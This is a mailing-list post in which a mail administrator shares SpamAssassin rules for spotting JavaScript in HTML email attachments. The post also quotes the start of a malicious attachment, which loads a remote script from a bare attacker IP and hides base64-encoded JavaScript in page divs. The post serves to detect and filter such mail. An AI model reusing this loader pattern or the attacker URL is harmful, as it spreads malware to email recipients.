[Mimedefang] HTML Mail / Active content filter
Florian Lohoff
f at zz.de
Tue Apr 11 07:34:01 EDT 2023
Hi Kevin,
On Tue, Apr 11, 2023 at 06:53:48AM -0400, Kevin A. McGrail via MIMEDefang wrote:
> There are a LOT of obuscation techniques but there are also real (but very
> stupid) banks that do things like email html files for instructions to their
> clients and things.
>
> Do you have a sample of the file with the bad HTML and I can see if there
> are SA rules that hit it too?
Normal Spamassassin did not match anything significant - I added these as custom
rules:
rawbody ZZ_JS_MIME /["']text\/javascript["']/i
describe ZZ_JS_MIME Javascript mimetype
score ZZ_JS_MIME 4
rawbody ZZ_JS_SCRIPT /\<\s*script\s+.*src\s*=\s*["']\s*(https|http):/i
describe ZZ_JS_SCRIPT External javascript
score ZZ_JS_SCRIPT 7.0
rawbody ZZ_JS_SCRIPT2 /javascript/i
describe ZZ_JS_SCRIPT2 Only javascript string
score ZZ_JS_SCRIPT2 0.1
HTML attachment part of the mail started like this. Then it had an image
as base64 and a div with hundrets of base64 snipped which - when merged - was
a long javascript. So i guess they included jquery for its base64
decoder and the other external script uri to jumpstart decoding and
running the JS code.
<html lang="en">
<head>
<title>$customersname</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.3/jquery.min.js"></script>
<script type="text/javascript" src="http://213.194.163.32/ZAHJI.php?i=472"></script>
<style type="text/css">
[ ... ]
</style>
</head>
<body>
<div id="table"><p>KGZ1bmN0aW9uIChtaWR...</p><p>eXBlY3RpbmlicmFuY2goZ3JheXd ...
[ ... ]
Flo
--
Florian Lohoff f at zz.de
Any sufficiently advanced technology is indistinguishable from magic.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 833 bytes
Desc: not available
URL: <https://lists.mimedefang.org/pipermail/mimedefang_lists.mimedefang.org/attachments/20230411/d35d00aa/attachment-0001.sig>
More information about the MIMEDefang
mailing list